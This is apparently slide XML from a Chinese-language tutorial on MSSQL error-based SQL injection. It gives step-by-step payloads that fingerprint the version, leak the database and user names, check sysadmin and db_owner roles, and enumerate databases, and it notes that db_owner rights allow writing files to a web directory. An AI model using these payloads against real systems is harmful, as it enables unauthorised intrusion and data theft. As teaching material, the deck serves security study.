                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断数据库版本号：</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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语句：[ id=1  </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mn-ea"/>
              </a:rPr>
              <a:t>and @@version&gt;0 </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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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说明：＠＠version是mssql 的全局变量，如果我们把它写成这样 and @@version&gt;0 那个后面的mssql就会强行@@version 强行转换成数字但是失败，所以就会将数据库信息暴露出来</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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版本号：</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nt5.2</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win2003 </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   </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nt6.0</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win2008</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="853441"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580100" y="1482450"/>
            <a:ext cx="11748347" cy="266489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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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4</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、获取当前数据库：  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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payload</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and </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db_name</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()&gt;0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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                  and 1=</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db_name</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>说明：在将 nvarchar 值 '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>ichunqiu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>' 转换成数据类型 int 时失败。所以会将数据库名字显示出来</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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5</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a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>判断当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>角色</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>是否拥有比较高的权限</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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语句：</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96B8D00-CADD-1B48-A717-AD396D34AA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374232" y="3973974"/>
            <a:ext cx="6096000" cy="2457148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select IS_SRVROLEMEMBER(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>serveradmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>')) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>setupadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>securityadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>diskadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>bulkadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a: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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1088946"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633572" y="1899988"/>
            <a:ext cx="11748347" cy="2831538"/>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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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6</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、判断当前</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数据库角色</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是否为DB_OWNER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Payload</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and 1=(select </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is_member</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db_owner</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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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说明：如果是</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DB_OWNER </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在这样的权限下我们可以通过各种备份方式往目标的网站目录里写文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170"/>
            <a:endParaRPr altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>7</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、获取当前用户名字：</a:t>
            </a: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sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ser_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ame</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()&gt;0 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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说明：在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。于是将用户名字显示出来</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:endPar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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558709" y="1867214"/>
            <a:ext cx="12055731" cy="340355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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取所有数据库名：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select name from m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>aster.sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>where database_id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)&gt;0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>说明：在将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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值 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>master' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>转换成数据类型 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>时失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
